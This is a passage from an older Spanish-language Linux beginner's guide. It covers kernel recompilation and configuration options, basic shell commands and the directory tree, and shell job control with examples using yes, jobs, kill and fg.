- OS/2 o Coherent.
-
- ¿Que necesito para recompilar el Kernel?
-
- Necesitaremos:
-
- 1. Las fuentes del Kernel que se proveen con cualquier distribucion de
- Linux, tambien los podemos actualizar de Internet para poder contar con
- la ultima version. Aproximadamente los fuentes comprimidos con gzip
- ocupan 8MB y una vez descomprimido en el disco usan cerca de 30MB.
-
- 2. El compilador de C "gcc" incluido en el paquete de "Development"
-
- 3. Las librerias "libc".
-
- Archivos y directorios.
-
- Entre en la cuenta root y vaya al directorio /usr/src. Si instalo las
- fuentes en la instalacion de Linux, habra aqui un directorio linux, con las
- fuentes antiguas. Si quiere preservar esas fuentes (y tiene espacio de
- sobra), renombre (con mv) ese directorio a linux-x.y.z. Es importante que
- antes de descomprimir las nuevas fuentes no haya ningun directorio
- /usr/src/linux.
-
- Ahora, en /usr/src, descomprima las fuentes con
-
- tar xvfzp linux-x.y.z.tar.gz
-
- (Si solo tiene un fichero .tar, sin .gz, elimine la z del comando
- tar). Los contenidos del fichero se expandir n en /usr/src/linux. Vaya
- ahora a ese directorio y lea el fichero README.
-
- Configuracion del Kernel
-
- Antes de recompilar debemos configurar que caracteristicas tendra
- nuestro nuevo kernel para ello primero limpiaremos de anteriores
- configuraciones el disco con:
-
- make mrproper
-
- luego comenzaremos con la configuracion en si con:
-
- make config
-
- invocado en el directorio /usr/src/linux inicia un programa shell-
- script de configuracion que le preguntar bastantes cosas. Requiere que este
- instalado bash, con lo que debe existir /bin/bash, /bin/sh o la variable
- $BASH.
-
- Si los fuentes que posee son superiores al 2.0.x, existen dos metodos
- bastante mas agradables e interactivos de llevar a cabo la configuracion;
- invocando desde modo texto, en el mismo directorio mencionado anteriormente
-
- make menuconfig
-
- Iniciar un colorido programa muy agradable y bastante mas funcional
- que el make config a secas, para llevar a cabo la configuracion del kernel.
-
- Observar que su uso es bastante intuitivo; las opciones con un < >
- indican la posibilidad de modularizar; si en ella presionamos M la
- seleccionaremos como modulo. Si presionamos ESPACIO aparecer un * indicando
- que ser incluido en el kernel. Finalmente, si presionamos N lo
- deseleccionaremos.
-
- Las opciones marcadas con [ ] no son modularizables.
-
- Si Vd. es un fan de las X, entonces puede arrancar desde un xterm el
- script equivalente, ejecutando
-
- make xconfig
-
- Supongo (porque siempre lo ice con make menuconfig) que aparecer ante
- sus ojos un maravilloso y grafico programa de seleccion y configuracion del
- kernel bajo X Window .
-
- A continuacion describire las opciones que creo son mas importantes a
- tener en cuenta al momento de compilar de todos modos las que aqui no este
- comentadas y Ud. Desee conocer cualquiera de los metodos de configuracion
- usados tendra un acceso a ayuda.
-
- Emulacion de coprocesador (kernel math emulation): Si no tiene
- coprocesador matematico debe contestar `y' a esto. Si tiene coprocesador y
- contesta `y' la emulacion ser instalada pero no usada; funcionar , pero le
- ocupar memoria innecesariamente. Ademas, he oido que la emulacion es lenta,
- lo que se traducir en unas pesadas X-Window.
-
- Soporte de discos IDE y MFM/RLL: Normalmente necesitar este soporte,
- pues es el de los discos habituales en los PCs. Este manejador no gestiona
- discos SCSI, para eso esta la opcion especifica que luego veremos. Ahora se
- le preguntar si quiere usar ``old disk-only'' y manejadores ``new IDE''.
- Tiene que elegir uno de ellos. La diferencia principal es que el nuevo (new
- IDE) maneja controladoras secundarias y CD-ROMs IDE/ATAPI, hasta cuatro
- dispositivos, pero ocupa 4 KB mas que el antiguo. Se supone que los nuevos
- manejadores mejoran tambien velocidad y fiabilidad, en especial si dispone
- de dispositivos EIDE.
-
- Soporte de redes (networking support): En principio, contestaria
- afirmativamente si la maquina estuviera en una red local o conectada a la
- Internet con SLIP/PPP. Sin embargo, muchos programas, como ocurre con el
- sistema XWindow, requieren el soporte de red, asi que lo mejor es contestar
- `y' siempre. Despues se le preguntar si quiere soporte TCP/IP: conteste
- afirmativamente aun no estando seguro.
-
- Limitar memoria a 16 Mb (Limit memory to low 16MB)
-
- Hay controladores de DMA en 386 con problemas para direccionar mas de
- 16 MB de RAM. Conteste `y' en el caso (raro) de que tenga uno de estos.
-
- Comunicacion entre procesos System V (System V IPC): Sinceramente no
- se bien lo que es pero lei que no es recomendable desactivarlo.
-
- Tipo de procesador (Processor type): Deber elegir siempre la CPU que
- tenga (aunque la versión de 386 funcionar en todas las maquinas).
-
- Soporte SCSI (SCSI support): Si tiene dispositivos SCSI, conteste
- `y'. Se le preguntaran entonces mas cosas: soporte de CD-ROM, discos y que
- clase de adaptador utiliza.
-
- Soportes de tarjetas de red (Network device support): Si tiene
- tarjeta de red, o quiere usar PPP, SLIP o PLIP (puerto paralelo usado para
- conectarse a Internet), conteste afirmativamente. El script le preguntara
- ahora que tarjeta tiene y que protocolo usar.
-
- Sistemas de ficheros (Filesystems): El programa le preguntara si
- quiere soporte para los siguientes sistemas de ficheros:
-
- * Standard (minix) - Las nuevas distribuciones no crean sistemas Minix, y
- mucha gente no las usa para nada, pero puede convenir elegirla. Algunos
- ``discos de rescate'' usan el sistema Minix como formato de sus disquetes,
- ya que da menos problemas.
-
- * Extended fs - Fue la primera version del sistema extendido, pero ya no se
- usa. No necesita seleccionarla.
-
- * Second extended - Este es el sistema mas usado. Seguramente lo usara Vd.
- tambien. Seleccione `y'. (Ojo con seleccionarlo como modulo; aunque se
- puede, el sistema de ficheros en el que este su partición "/" debe estar
- incluido el kernel no-modularmente, ya que de lo contrario no podra
- arrancar.)
-
- * xiafs filesystem - Hace mucho pudo ser usado, pero ahora mismo no.
-
- * msdos - Seleccionelo si quiere acceder desde Linux a sus particiones de
- MS-DOS o quiere montar disquetes de ese sistema.
-
- * umsdos - Este sistema permite añadir a un sistema MS-DOS las
- caracteristicas tipicas de Unix como nombres largos o enlaces. Sirve para
- quienes quieran instalar Linux en la particion DOS, pero nada mas.
-
- * /proc - (una idea robada descaradamente a Bell Labs, si no me equivoco)
- No se trata de algo que se guarde en el disco, sino de una interfaz por
- medio de ficheros con la tabla de procesos del nucleo, usada por
- programas como `ps'. Pruebe a teclear `cat /proc/meminfo' o
- `cat /proc/devices'. Algunos shells (rc, concretamente) hacen uso de
- /proc/self/fd (en lugar de /dev/fd) para E/S. Debe contestar
- afirmativamente a la pregunta: muchas utilidades de Linux lo necesitan.
-
- * NFS - Si su maquina esta en red y quiere acceder a sistemas de ficheros
- remotos con NFS, conteste `y' a esta pregunta.
-
- * ISO9660 - Tipico en los CD-ROMs. Si tiene un CD-ROM, seleccione esta
- opcion.
-
- * OS/2 HPFS - Para acceder a disco de OS/2. En el momento de escribir esto,
- el soporte HPFS es de solo lectura.
-
- * System V and Coherent - para particiones de sistemas Coherent y System V
- (otras variantes de Unix para PC). Conteste "no".
-
- * quota support - Seleccionelo si quiere administrar el espacio que
- consumen en disco los usuarios del sistema.
-
- * vfat - En conjuncion con el sistema de fichero fat o msdos nos permitira
- acceso a las particiones de w95, con soporte de nombres ``largos'' y
- demas. En el momento de escribir esto, se desconoce si soportar la
- ``nueva'' fat32 del w95-OSR2.
-
- * SMB filesystem support - En conjuncion con el paquete samba nos permitir
- montar volumenes compartidos por clientes de red NetBios.
-
- * SMB w95 bug workaround - Corrije un bug que experimentan los volumenes
- exportados por servidores w95.
-
- * Amiga FFS support - Soporte para el sistema de ficheros Fast File System
- de Amiga.
-
- * UFS filesystem support - Soporte para el Unix FileSystem, empleado por
- algunos Unix BSD, como SunOS, FreeBSD, NetBSD, NeXTstep. Permite montar
- dichas particiones o disquetes en modo de solo lectura.
-
- * NCP filesystem support - Permite montar volumenes NetWare. Necesitar
- programas cliente para llevarlo a cabo.
-
- Pero. ¿que sistemas de ficheros necesito! Teclee `mount'. La salida
- ser como esta:
-
- blah# mount
- /dev/hda1 on / type ext2 (defaults)
- /dev/hda3 on /usr type ext2 (defaults)
- none on /proc type proc (defaults)
- /dev/fd0 on /mnt type msdos (defaults)
-
- Observe cada linea; la palabra que sigue a `type' es el tipo de
- sistema usado. En este ejemplo, los sistemas raiz (/) y /usr usan el
- sistema ``second extended'', ademas usamos sistema ``proc'' y hay montado
- un disquete MS-DOS.
-
- Para saber que sistemas de ficheros usa en el nucleo actual puede
- teclear `cat /proc/filesystems' siempre y cuando tenga al menos soporte
- proc.
-
- Manejadores de tipo caracter (Character devices): Aqui se activan los
- manejadores para impresoras (por puerto paralelo), ratones de bus, ratones
- PS/2 (usado tambien en muchos trackballs de los portatiles), algunos
- manejadores de cintas y otros. Conteste segun su hardware.
-
- Placa de sonido (Sound card): Si tiene placa de sonido conteste `y' y
- despues otro programa de configuracion le preguntara acerca de la tarjeta
- de sonido que tiene. Aqui es importante saber el puerto E/S, la IRQ, DMA de
- nuestra placa de Sonido.
-
- Otras opciones de configuracion: No todas las opciones se han listado
- ya que cambian mucho y otras son completamente evidentes (por ejemplo, el
- soporte 3Com 3C509).
-
- Kernel hacking: Traduccion del fichero README de Linus: La
- configuración ``kernel hacking'' suele dar lugar a un nucleo mas grande y/o
- lento, y puede hacerlo menos estable al configurar algunas rutinas
- especiales para encontrar errores del nucleo. Deber contestar `n' a la
- pregunta.
-
- El archivo Makefile
-
- Tras hacer make config, un mensaje le dira que ya esta preparado el
- kernel y que "revise el fichero Makefile para opciones adicionales".
-
- Por tanto, veamos el Makefile. Probablemente no tendra que cambiar
- nada, pero debe mirarse. Sus opciones podran cambiarse con el comando
- "rdev" una vez que el kernel este compilado.
-
- Compilacion del Kernel
-
- Limpieza y dependencias
-
- Cuando se termina de configurar debe ejecutar "make dep" y "make
- clean. Haga `make dep', lo que preparar las dependencias en poco tiempo, a
- menos que su PC sea muy lento. Cuando acabe, haga "make clean". Esto
- elimina ficheros objetos y demas de la version anterior. No olvidar este
- paso.
-
- La compilacion
-
- Despues de preparar dependencias, puede ejecutar "make zImage"(esta
- es la parte que tarda mas tiempo). `make zImage' compilar el nucleo y lo
- dejar comprimido en el subdirectorio arch/i386/boot/zImage junto a otros
- ficheros. La "z" inicial indica que el lo que obtenemos es una imagen
- comprimida del kernel, se descomprime automaticamente al ser ejecutado.
-
- Compilacion de Modulos
-
- Las ordenes make modules; make modules_install compilaran los modulos
- que hayamos seleccionado, y los instalaran. No olvidar ejecutar depmod -a
- en cuanto hayamos arrancado con dicho nucleo.
-
- Instalacion del Kernel nuevo
-
- La instalacion se hara en el directorio "/boot" si lo que instalamos
- es RedHat, en otro caso se la hace en "/". Veamos ahora como hacer esto:
-
- cd arch/i386/boot
- chmod 400 zImage
- rdev -R zImage 1
- cp zImage /boot/nuevokernel
-
- Solo nos resta retocar el archivo lilo.conf que se encuentra en el
- directorio /etc.
-
- #CAPITULO IV
-
- USO
-
- Conceptos basicos preliminares
-
- Para entender mejor Linux muchas veces haremos comparaciones con DOS,
- asi que aqui van algunas consideraciones acerca de MS-DOS o Linux. Muchos
- usuarios de Linux confian en MS-DOS para aplicaciones tales como
- procesadores de texto. Aunque Linux proporciona sus propios an logos para
- estas aplicaciones (por ejemplo, TEX), existen varias razones por las que
- un usuario concreto desearia correr tanto MS-DOS como Linux. Hay muchas
- aplicaciones comerciales para MS-DOS que no estan disponibles tidavia para
- Linux, y no hay ninguna razon por la que no pueda usar ambos.
-
- Como puede saber, MS-DOS no utiliza completamente la funcionalidad de
- los procesadores 80386 y 80486. Por otro lado, Linux corre completamente en
- el modo protegido del procesador y explota todas las caracteristicas del
- este. Puede acceder directamente a toda su memoria disponible (e incluso
- mas haya de la disponible, usando RAM virtual). Linux proporciona un
- interface UNIX completo no disponible bajo MS-DOS el desarrollo y
- adaptacion de aplicaciones UNIX bajo Linux es cosa facil, mientras que,
- bajo MS-DOS, Ud. esta limitado a un pequeño subgrupo de la funcionalidad de
- programacion UNIX. Al ser Linux un verdadero sistema UNIX, Ud. no tendria
- estas limitaciones.
-
- Podriamos debatir los pros y contras de MS-DOS y Linux durante
- paginas y paginas. Sin embargo, baste decir que Linux y MS-DOS son
- entidades completamente diferentes. MS-DOS no es caro (comparado con otros
- sistemas operativos comerciales), y tiene un fuerte asentamiento en el
- mundo de los PC's. Ningun otro sistema operativo para PC ha conseguido el
- nivel de popularidad de MS-DOS, basicamente porque el coste de esos otros
- sistemas operativos es inaccesible para la mayoria de los usuarios de PCs.
- Muy pocos usuarios de PC pueden imaginar pagar lo que cuesta por ejemplo un
- Solaris. Linux, sin embargo, es gratis.
-
- Podra emitir sus propios juicios de Linux y MS-DOS basados en sus
- expectativas y necesidades. Linux no esta destinado a todo el mundo.
-
- Este capitulo no presentara gran cantidad de detalles ni cubriria
- temas muy avanzados. Sino que esta pensado para permitir al nuevo usuario
- de Linux comenzar a usar el sistema y situarlo en una posicion en la que
- pueda leer libros mas generales sobre UNIX y entender las diferencias
- basicas entre otros sistemas UNIX y Linux.
-
- A primera vista, UNIX parece como MS-DOS (despues de todo, partes de
- MS-DOS fueron tomadas de CP/M, el cual fue a su vez inspirado en UNIX
- incluso muchas de las novedades que Windows 95 pretende presentar son
- caracteristicas de los sistemas UNIX). Pero, solo las caracteristicas
- superficiales de UNIX se parecen a MS-DOS.
-
- Como ya dijimos, Linux es un sistema operativo multitarea y
- multiusuario. Bajo UNIX, para que los usuarios puedan identificarse en el
- sistema, deben registrarse (login), proceso que consta de dos pasos:
- Introducir el nombre de usuario (login) (el nombre con que ser
- identificado por el sistema), y una palabra clave o contraseña (password),
- la cual es su llave personal secreta para entrar en la cuenta. Como solo
- usted conoce su palabra clave, nadie mas podra logearse en el sistema con
- su nombre de usuario. Por esto es muy importante tomarse unos minutos para
- elegir una palabra clave que no sea facil de adivinar o desencriptar, es
- comun en los novatos usar palabras claves que tiene algo que ver con ellos,
- por ejemplo el nombre de la esposa, madre, hija, fecha de nacimiento,
- numero de documento, hasta el nombre de su mascota, de esta manera los
- hacker usan diccionarios con (por ejemplo) nombres comunes de mascotas para
- lograr adivinar claves de usuarios desprevenidos.
-
- En los sistemas UNIX tradicionales, el administrador del sistema
- asignara el nombre de usuario y una palabra clave inicial en el momento de
- crear la cuenta de usuario.
-
- Ademas, cada sistema UNIX tiene un nombre del sistema (hostname. Este
- "hostname" le da nombre a la maquina, ademas de caracter y encanto, por
- ejemplo la mia se llama Tesla, la anterior fue Newton y la anterior
- Leonardo. El nombre del sistema es usado para identificar maquinas en una
- red, pero incluso aunque la maquina no este en red, deberia tener un nombre.
-
- Antes de poder usar el sistema, deber crear una cuenta de usuario.
- Esto es necesario porque no es buena idea usar la cuenta de root para los
- usos normales. La cuenta de root deberia reservarse para el uso de comandos
- privilegiados y para el mantenimiento del sistema.
-
- Shells
-
- La forma de comunicarse entre el S.O., el hardware y el usuario es un
- Shell, en Linux, el mas difundido es "bash" que significa "Bourne again
- shell" aunque existen varios shells para todos los gustos. En la mayoria de
- las exploraciones en el mundo de UNIX, estar hablando con el sistema a
- traves del uso de un shell. Un shell es simplemente un programa que toma la
- entrada del usuario (ej. las ordenes que teclea) y las traduce a
- instrucciones. Esto puede ser comparado con el COMMAND.COM de MS-DOS o el
- 4DOS para los mas exquisitos, los cuales efectuan esencialmente la misma
- tarea. El shell es solo uno de los interfaces con UNIX hay muchos
- interfaces posibles como el sistema X Windows, el cual le permite ejecutar
- comandos usando el raton y el teclado.
-
- Antes de continuar, deberiamos ver como salir del sistema. Desde la
- linea de comandos usaremos la orden "exit" para salir. Hay otras formas,
- pero esta es la mas facil.
-
- Directorios
-
- La mayoria de los sistemas UNIX tienen una distribucion de ficheros
- estandar, de forma que recursos y ficheros puedan ser facilmente
- localizados. Esta distribucion forma el arbol de directorios, el cual
- comienza en el directorio "/", tambien conocido como "directorio raiz".
- Directamente por debajo de "/" hay algunos subdirectorios importantes:
- /bin, /etc, /dev y /usr, entre otros. Estos a su vez contienen otros
- directorios con ficheros de configuracion del sistema, programas, etc. En
- particular, cada usuario tiene un directorio "home". Este es el directorio
- en el que el usuario guardara sus archivos. Usualmente, los directorios
- home de los usuarios cuelgan de /home y son nombrados con el nombre del
- usuario al que pertenecen.
-
- El siguiente es un ejemplo de arbol de directorios en linux.
-
- /________bin
- |
- |__dev
- |
- |__etc
- |
- |__home_______juan
- | |
- | |__pedro
- |__lib
- |
- |__proc
- |
- |__tmp
- |
- |__usr_______X386
- |
- |__bin
- |
- |__emacs
- |
- |__etc
- |
- |__g++-include
- |
- |__include
- |
- |__lib
- |
- |__local_______bin
- | |
- | |__emacs
- | |
- | |__etc
- | |
- | |__lib
- |
- |__man
- |
- |__spool
- |
- |__src_______linux
- |
- |__tmp
-
- Comandos Basicos
-
- Antes de comenzar es importante destacar que todos los nombres de
- ficheros y comandos son "case-sensitive" (que hacen diferencia entre
- mayusculas y minusculas, a diferencia de sistemas operativos como MS-DOS).
- Por ejemplo, el comando make es diferente a Make o MAKE. Lo mismo ocurre en
- el caso de nombres de ficheros o directorios.
-
- Cambio de directorio:
-
- La orden para movernos por la estructura de directorios es cd,
- abreviacion de "cambio de directorio". Hay que destacar, que la mayoria de
- las ordenes UNIX mas usadas son de dos o tres letras.
-
- La forma de uso de la orden cd es:
-
- cd <directorio>
-
- donde <directorio> es el nombre del directorio al que queremos ir. Si
- usamos cd sin par metros esto no llevara a nuestro directorio. Tenemos
- tambien dos puntero uno al directorio padre ".." y otro a si mismo "." Esto
- tambien fue copiado por DOS.
-
- Consultar el directorio actual
-
- Para saber en que directorio no escontramos usaremos el comando "pwd"
-
- Consultar el contenido de los directorios
-
- Una vez que podemos navegar por nuestro arbol de directorio lo mas
- importantes es poder ver que tenemos en cada uno. Para eso usaremos el
- comando "ls", ls vendria a ser "dir" del DOS, pero como vernos mas adelante
- es mucho mas poderoso como todos los comandos de Linux. Ls tiene muchos
- parametros que van a afectar su comportamiento a todos pero el mas usado
- sin duda ser "-l" que no mostrara con mas detalle el contenido del
- directorio.
-
- Consultar las paginas del manual
-
- En este momento creo que uno de los comandos que mas nos van a ayudar
- en el aprendizaje de Linux es "man" que siguiendo con las comparaciones con
- el DOS vendria a ser el "help" con man podremos solicitar informacion de
- todos los comandos e incluso algunos programas y aplicaciones tiene sus
- propias paginas de manual. En mi experiencia personal man me ayudo mas
- veces que cualquier libro.
-
- La forma de usarlo es:
-
- man <comando>
-
- Creacion de directorios:
-
- Para esto usaremos el comando "mkdir" como en DOS seguido del nombre
- del directorio a crear.
-
- mkdir <nombre>
-
- Copiado de archivos
-
- La orden "cp" copia los ficheros listados en la linea de comandos al
- fichero o directorio pasado como ultimo argumento. Notese como se usa el
- directorio "." para referirnos al directorio actual.
-
- cp <origen> <destinod>
-
- Mover archivos
-
- Tanto para mover como para renombrar archivos o directorio usaremos
- el comando "mv" de identica manera a "cp" solo que en esta caso no se
- preservara el origen.
-
- mv <origen> <destinod>
-
- Borrado de archivos
-
- Para borrar se usa "rm" que viene de remove. Se usa con un parametro
- que es el nombre del fichero a borrar o una lista de ellos. Tambien lo
- podemos usar para borrar directorios completos con el parametro "-r" a hay
- que ser muy prudente y cuidadoso con este comando ya que podemos hacer
- macanas.
-
- rm <nombre de archivo o directorio>
-
- Mirando los ficheros
-
- Las ordenes "more", "cat" y "less" son usadas para ver el contenido
- de ficheros. More y less muestran el fichero pantalla a pantalla mientras
- que cat lo muestra entero de una vez.
-
- more <archivo>
- less <archivo>
- cat <archivo>
-
- El sistema de ficheros es la coleccion de ficheros y la jerarquia de
- directorios de su sistema.
-
- Primero cambie al directorio raiz (cd /) y ejecute ls -F.
- Probablemente vera estos directorios:
-
- bin, dev, etc, home, install, lib, mnt, proc, root, tmp, user, usr, y var.
-
- La distribucion de directorios y archivos es Unix es muy ordenada y
- distinta que en DOS, veamos para que usamos cada directorio.
-
- Directorio
- Contenido
-
- /bin
- /bin Es la abreviacion de "binaries", o ejecutables. Es donde residen la
- mayoria de los programas esenciales del sistema.
-
- /dev
- /dev Los "ficheros" en /dev son conocidos como controladores de dispositivo
- (device drivers)_son usados para acceder a los dispositivos del
- sistema y recursos, como discos duros, modems, memoria, etc
-
- /etc
- /etc Contiene una serie de ficheros de configuracion del sistema. Estos
- incluyen /etc/passwd (la base de datos de usuarios), /etc/rc (guiones
- de inicializacion del sistema), etc.
-
- /sbin
- /sbin Se usa para almacenar programas esenciales del sistema, que usara el
- administrador del sistema.
-
- /home
- /home Contiene los directorios "home" de los usuarios. Por ejemplo,
- /home/juan es el directorio del usuario "juan".
-
- /lib
- /lib Contiene las imagines de las librerias compartidas. Estos ficheros
- contienen codigo que compartirian muchos programas.
-
- /proc
- /proc Es un "sistema de ficheros virtual". Los ficheros que contiene
- realmente residen en memoria, no en un disco. Hacen referencia a
- varios procesos que corren en el sistema, y le permiten obtener
- informacion acerca de que programas y procesos estan en ejecucion.
-
- /usr
- /usr Es un directorio muy importante. Contienen una serie de subdirectorios
- que contienen a su vez algunos de los mas importantes y utiles
- programas y ficheros de configuracion usados en el sistema.
-
- /usr/X386
- /usr/X386 Contiene todos los ejecutables de X Window, ficheros de
- configuracion y de soporte.
-
- /usr/bin
- /usr/bin Es el deposito real de programas del sistema UNIX. Contiene la
- mayoria de los programas que no se encuentran en otras partes como
- /bin.
-
- /usr/include
- /usr/include Contiene los ficheros de cabecera para el compilador de C.
- Estos ficheros (la mayoria de los cuales terminan en .h, de
- "header") declaran estructuras de datos, subrutinas y
- constantes usados en la escritura de programas en C. Los
- ficheros que se encuentran en /usr/include/sys son
- generalmente usados en la programacion de en UNIX a nivel de
- sistema. Si esta familiarizado con el lenguaje de programacion
- C, aqui encontrara los ficheros de cabecera como stdio.h, el
- cual declara funciones como printf().
-
- /usr/local
- /usr/local Es el directorio donde normalmente pondremos nuestras
- aplicaciones.
-
- /usr/src
- /usr/src Contiene el codigo fuente (programas por compilar) de varios
- programas de su sistema. El mas importante es /usr/src/linux, el
- cual contiene el codigo fuente del kernel de Linux.
-
- /var
- /var Contiene directorios que a menudo cambian su tamaño o tienden a
- crecer. Muchos de estos directorios solian residir en /usr, por
- ejemplo en /var/adm encontraremos varios ficheros de interes para el
- administrador del sistema, especificamente históricos del sistema, los
- cuales recogen errores o problemas con el sistema.
-
- #Capitulo V
-
- Control de Tareas
-
- Tareas y procesos
-
- Control de Tareas es una utilidad incluida en muchos shells
- (incluidas Bash y Tcsh), que permite el control de multitud de comandos o
- tareas al momento. Antes de seguir, deberemos hablar un poco sobre los
- procesos.
-
- Cada vez que usted ejecuta un programa, usted lanza lo que se conoce
- como proceso, que es simplemente el nombre que se le da a un programa
- cuando se esta ejecutando. El comando ps visualiza la lista de procesos que
- se estan ejecutando actualmente, por ejemplo:
-
- /home/jperez# ps
-
- PID TT STAT TIME COMMAND
- 24 3 S 0:03 (bash)
- 161 3 R 0:00 ps
-
- La columna PID representa el identificador de proceso. La ultima
- columna COMMAND, es el nombre del proceso que se esta ejecutando. Ahora
- solo estamos viendo los procesos que esta ejecutando jperez. Vemos que hay
- dos procesos, bash (Que es el shell o interprete de comandos que usa
- jperez), y el propio comando ps. Como puede observar, bash se ejecuta
- concurrentemente con el comando ps. Bash ejecuto ps cuando jperez tecleo el
- comando. Cuando ps termina de ejecutarse (despues de mostrar la tabla de
- procesos), el control retorna al proceso bash, que muestra el prompt,
- indicando que esta listo para recibir otro comando. Un proceso que esta
- corriendo se denomina tarea para el shell. Los terminos proceso y tarea,
- son sinonimos. Sin embargo, se suele denominar "tarea" a un proceso, cuando
- es usado en conjuncion con control de tareas, que es un rasgo del shell que
- permite cambiar entre distintas tareas.
-
- Hay muchos mas procesos aparte de estos corriendo en el sistema, para
- verlos todos, teclearemos el comando "ps -aux".
-
- En muchos casos, los usuarios solo ejecutan un trabajo cada vez, que
- es el ultimo comando que ellos teclearon desde el shell. Sin embargo,
- usando el control de tareas, usted podra ejecutar diferentes tareas al
- mismo tiempo, cambiando entre cada uno de ellos conforme lo necesite.
- Supongamos que esta usando un procesador de textos, y de repente necesita
- parar y realizar otra tarea, con el control de tareas, usted podria
- suspender temporalmente el editor, y volver al shell para realizar
- cualquier otra tarea, y luego regresar al editor como si no lo hubiese
- dejado nunca. Lo siguiente solo es un ejemplo, hay montones de usos
- practicos del control de tareas.
-
- Primer plano y Segundo plano
-
- Un proceso puede estar en Primer plano o en Segundo plano
- (background). Solo puede haber un proceso en primer plano por vez, el
- proceso que esta en primer plano, es el que interactua con usted, recibe
- entradas de teclado, y envia las salidas al monitor. (Salvo, por supuesto,
- que haya redirigido la entrada o la salida. El proceso en segundo plano, no
- recibe ninguna señal desde el teclado por lo general, se ejecutan en
- silencio sin necesidad de interaccion.
-
- Algunos programas necesitan mucho tiempo para terminar, y no hacen
- nada interesante mientras tanto. Compilar programas es una de estas tareas,
- asi como comprimir un fichero grande. No tiene sentido que se siente y se
- aburra mientras estos procesos terminan. En estos casos es mejor lanzarlos
- en segundo plano, para dejar el ordenador en condiciones de ejecutar otro
- programa.
-
- Los procesos pueden ser suspendidos. Un proceso suspendido es aquel
- que no se esta ejecutando actualmente, sino que esta temporalmente parado.
- Despues de suspender una tarea, puede indicar a la misma que continue, en
- primer plano o en segundo, segun necesite. Retomar una tarea suspendida no
- cambia en nada el estado de la misma la tarea continuara ejecutandose justo
- donde se dejo.
-
- Tenga en cuenta que suspender un trabajo no es lo mismo que
- interrumpirlo. Cuando usted interrumpe un proceso (generalmente con la
- pulsación de |ctrl-C|, el proceso muere, y deja de estar en memoria y
- utilizar recursos del ordenador. Una vez eliminado, el proceso no puede
- continuar ejecutandose, y deber ser lanzado otra vez para volver a realizar
- sus tareas. Tambien se puede dar el caso de que algunos programas capturan
- la interrupcion, de modo que pulsando |ctrl-C| no se para inmediatamente.
- Esto se hace para permitir al programa realizar operaciones necesarias de
- limpieza antes de terminar. De hecho, algunos programas simplemente no se
- dejan matar por ninguna interrupción.
-
- Envio a segundo plano y eliminacion procesos
-
- Empecemos con un ejemplo sencillo. El comando yes es un comando
- aparentemente inutil que envia una serie interminable de y-es a la salida
- estandar. (En realidad es muy util. Si se utiliza una tuberia (o "pipe")
- para unir la salida de y-es con otro comando que haga preguntas del tipo
- si/no, la serie de y-es confirmaria todas las preguntas.)
-
- /home/jperez# yes
- y
- y
- y
- y
- y |ctrl-C|
-
- La serie de y-es continuara hasta el infinito, a no ser que usted la
- elimine, pulsando la tecla de interrupcion. Tambien puede deshacerse de
- esta serie de y-es redigiriendo la salida estandar de yes hacia /dev/null,
- que es como una especie de "agujero negro" o papelera para los datos. Todo
- lo que usted envie alli, desaparecer: /home/jperez# yes > /dev/null. Ahora
- va mucho mejor, el terminal no se ensucia, pero el prompt de la shell no
- retorna. Esto es porque yes sigue ejecutandose y enviando esos inutiles
- y-es a /dev/null. Para recuperarlo, pulse la tecla de interrupcion.
-
- Supongamos ahora que queremos dejar que el comando yes siga
- ejecutandose, y volver al mismo tiempo a la shell para trabajar en otras
- cosas. Para ello enviaremos a yes a segundo plano, lo que nos permitir
- ejecutarlo, pero sin necesidad de interaccion.
-
- Una forma de mandar procesos a segundo plano es añadiendo un caracter
- "&" al final de cada comando.
-
- /home/jperez# yes > /dev/null &
- [1] 164
-
- Como podra ver, ha regresado a la shell. ¿Pero que es eso de
- "[1] 164"?, ¿Se esta ejecutando realmente el comando yes?. "[1]" representa
- el numero de tarea del proceso yes. La shell asigna un numero a cada tarea
- que se este ejecutando. Como yes es el unico comando que se esta ejecutando,
- se le asigna el numero de tarea 1. El numero "164" es el numero de
- identificacion del proceso, o PID, que es el numero que el sistema le
- asigna al proceso. Ambos numeros pueden usarse para referirse a la tarea
- como veremos despues.
-
- Ahora usted tiene el proceso yes corriendo en segundo plano, y
- enviando constantemente la señal y hacia el dispositivo /dev/null. Para
- chequear el estado del proceso, utilice el comando interno de la shell
- jobs:
-
- /home/jperez# jobs
- [1]+ Running yes >/dev/null &
-
- Tambien puede usar el comando ps, como mostramos antes, para
- comprobar el estado de la tarea.
-
- Para eliminar una tarea, utilice el comando kill. Este comando toma
- como argumento un numero de tarea o un numero de ID de un proceso. Esta era
- la tarea 1, asi que usando el comando
-
- /home/jperez# kill %1
-
- matar la tarea. Cuando se identifica la tarea con el numero de tarea,
- se debe preceder el numero con el caracter de porcentaje ("%").
-
- Ahora que ya hemos matado la tarea, podemos usar el comando jobs de
- nuevo para comprobarlo:
-
- /home/jperez# jobs
- [1]+ Terminated yes >/dev/null
-
- La tarea esta , en efecto, muerta, y si usa el comando jobs de nuevo,
- no mostrar nada.
-
- Tambien podra matar la tarea usando el numero de ID de proceso (PID),
- el cual se muestra conjuntamente con el ID de tarea cuando arranca la misma.
- En nuestro ejemplo el ID de proceso es 164, asi que el comando
-
- /home/jperez# kill 164
-
- es equivalente a
-
- /home/jperez# kill %1
-
- No es necesario usar el "%" cuando nos referimos a una tarea a traves
- de su ID de proceso.
-
- Detencion o parada y relanzamiento de tareas
-
- Hay otra manera de poner una tarea en segundo plano. Usted puede
- lanzarlo como un proceso normal (en primer plano), pararlo, y despues
- relanzarlo en segundo plano.
-
- Primero, lance el proceso yes en primer plano como lo haria
- normalmente:
-
- /home/jperez# yes > /dev/null
-
- De nuevo, dado que yes corre en primer plano, no debe retornar el
- prompt de la shell.
-
- Ahora, en vez de interrumpir la tarea con |ctrl-C|, suspenderemos la
- tarea. El suspender una tarea no la mata: solamente la detiene
- temporalmente hasta que Ud. la retoma. Para hacer esto usted debe pulsar la
- tecla de suspender, que suele ser |ctrl-Z|.
-
- /home/jperez# yes > /dev/null
-
- |ctrl-Z|
- [1]+ Stopped yes >/dev/null
- /home/jperez#
-
- Mientras el proceso esta suspendido, simplemente no se esta
- ejecutando. No gasta tiempo ni recursos del sistema en la tarea. Sin
- embargo, usted puede retomar el proceso de nuevo como si nada hubiera
- pasado. Continuara ejecutandose donde se dejo. Para relanzar la tarea en
- primer plano, use el comando fg (del ingles "foreground").
-
- /home/jperez# fg yes >/dev/null
-
- La shell muestra el nombre del comando de nuevo, de forma que tenga
- conocimiento de que tarea es la que ha puesto en primer plano. Pare la
